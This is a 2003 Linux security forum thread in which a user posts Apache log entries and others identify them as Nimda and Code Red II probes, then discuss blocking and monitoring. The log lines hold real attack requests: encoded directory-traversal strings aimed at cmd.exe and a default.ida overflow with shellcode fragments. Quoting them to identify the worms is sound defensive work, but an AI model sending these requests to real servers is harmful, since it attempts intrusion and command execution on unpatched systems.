LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-07-2003, 05:19 AM   #1
doublefailure
Member
 
Registered: Mar 2002
Location: ma
Distribution: slackware
Posts: 747

Rep: Reputation: 30
what the hack is this?


apache access log

24.162.164.121 - - [04/Apr/2003:16:50:47 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 333
24.162.164.121 - - [04/Apr/2003:16:50:53 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0" 404 349
24.162.164.121 - - [04/Apr/2003:16:50:57 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:16:51:00 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:16:51:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:16:51:07 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:16:51:11 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 299
24.162.164.121 - - [04/Apr/2003:16:51:14 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 299
24.162.164.121 - - [04/Apr/2003:16:51:16 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
24.162.164.121 - - [04/Apr/2003:16:51:19 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
24.162.119.123 - - [04/Apr/2003:17:51:02 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 289
24.162.29.46 - - [04/Apr/2003:18:01:10 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090 %u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 289
24.162.164.121 - - [04/Apr/2003:18:29:25 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294
24.162.164.121 - - [04/Apr/2003:18:29:28 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
24.162.164.121 - - [04/Apr/2003:18:29:30 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.162.164.121 - - [04/Apr/2003:18:29:33 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.162.164.121 - - [04/Apr/2003:18:29:36 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
24.162.164.121 - - [04/Apr/2003:18:29:38 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 333
24.162.164.121 - - [04/Apr/2003:18:29:41 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 333
24.162.164.121 - - [04/Apr/2003:18:29:45 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0" 404 349
24.162.164.121 - - [04/Apr/2003:18:29:51 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:18:29:54 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:18:29:57 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:18:29:59 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.162.164.121 - - [04/Apr/2003:18:30:01 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 299
24.162.164.121 - - [04/Apr/2003:18:30:03 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 299
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316

Last edited by doublefailure; 04-07-2003 at 05:24 AM.
 
Old 04-07-2003, 05:43 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590Reputation: 3590
AFAIK, Nimda worm.
You could have Googled/searched LQ for it.
 
Old 04-07-2003, 06:21 AM   #3
doublefailure
Member
 
Registered: Mar 2002
Location: ma
Distribution: slackware
Posts: 747

Original Poster
Rep: Reputation: 30
thanks ..
 
Old 04-07-2003, 02:03 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
This is the new CodeRed II variant:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%
 
Old 04-08-2003, 12:41 PM   #5
koy
Member
 
Registered: Apr 2003
Distribution: SuSe 10
Posts: 55

Rep: Reputation: 15
aint it trying to hack into an iis server?

anyways whatever it did it won't work as ur on linux
 
Old 04-08-2003, 01:46 PM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
>aint it trying to hack into an iis server?
Yup, another IIS ASAPI overflow. Sad part is the patch for this from MS has been out forever and my apache log is still filling with these requests. Hard to decide who to blame...MS for not checking their code or the lazy sysamins who can't take the time to patch there winblows servers.
 
Old 04-18-2003, 06:27 AM   #7
twantrd
Senior Member
 
Registered: Nov 2002
Location: CA
Distribution: redhat 7.3
Posts: 1,440

Rep: Reputation: 52
Hmm, i got that same line in my access_log as well.

So, that will only affect window's servers or is my linux server affected as well? Cuz now im starting to get worried that my linux server has a worm...


-twantrd
 
Old 04-18-2003, 11:27 AM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Nope it only afffects microsoft servers that run the IIS web server and don't have the patch installed. Your linux box is fine. Get used to seeing those in your logs though, because you will see them over and over. If you're worried about worms, download and run chkrootkit.
 
Old 04-20-2003, 09:49 PM   #9
osfestus
Member
 
Registered: Feb 2003
Posts: 92

Rep: Reputation: 15
well it is still a problem for Apache/Linux users even though it cannot affect Linux in the way it does Windows. The problem is that these annoying attacks can make a real dent in the bandwidth available to your legit users. It can waste alot of admin time, I HATE scrolling through lines of Code Red and CRII log entries just to look at real server data.
 
Old 04-21-2003, 11:59 AM   #10
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
I just put these people into /etc/hosts.deny ...well I used to but I get so many of them that it started to get a little out of hand.
 
Old 04-21-2003, 12:18 PM   #11
osfestus
Member
 
Registered: Feb 2003
Posts: 92

Rep: Reputation: 15
lol, When I first read this I was gonna say...you must not get alot of attacks, I don't have 2 hours a day just for logging IP's and then adding them to /etc/hosts.deny! Looks like you don't either. I wish ISP's or traffic aggregates would actually do something about the host networks for the machines that are STILL running these f&*^$@g code red variants. You know I have probably sent a hundred or so emails to various abuse@someisp.com addresses for different problems with attacks or scanners/viruses and have never ONCE gotten a reply. Just this weekend one of my mail servers got bombed by a spam email server in Germany. I mean, all relaying is denied but this damned box would not stop. It chaps my hide that I have to start creating iptables rules because of losers like that.
 
Old 04-24-2003, 10:03 AM   #12
fishsponge
Member
 
Registered: Apr 2003
Location: Cambridge, UK
Distribution: Debian/Solaris
Posts: 147

Rep: Reputation: 15
you might like to install HotSaNiC... here it is running on my home machine:

http://broadband.mongeese.co.uk/hotsanic

If you scroll to the right hand side you will see three graphs... default.ida, cmd.exe, and root.exe. These are graphs (which you can click on) displaying how often these worms hit your web server. HotSaNiC works on all CLF log files too.
 
Old 04-24-2003, 10:13 AM   #13
osfestus
Member
 
Registered: Feb 2003
Posts: 92

Rep: Reputation: 15
That is very cool, I think I will give that a look.
 
Old 04-24-2003, 01:23 PM   #14
fishsponge
Member
 
Registered: Apr 2003
Location: Cambridge, UK
Distribution: Debian/Solaris
Posts: 147

Rep: Reputation: 15
it is quite useful actually :-) gives a great overview and trend of your entire system.

it's all open source too, so you can custimize is for your own needs as much as you like (i think).

incase you were wondering.... the white gap is cos i shut my machine down for easter while i went away, so it has no data for that time period.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
hack,,, apenguinlinux General 4 02-22-2005 11:13 AM
hack,, apenguinlinux General 5 02-22-2005 10:40 AM
hack ?help me !! liumang Linux - Security 10 11-28-2004 05:21 AM
are they trying to hack me? epox111 Linux - Security 9 09-10-2003 09:23 PM
hack ? spooge Linux - Security 4 01-21-2003 12:54 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 08:10 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration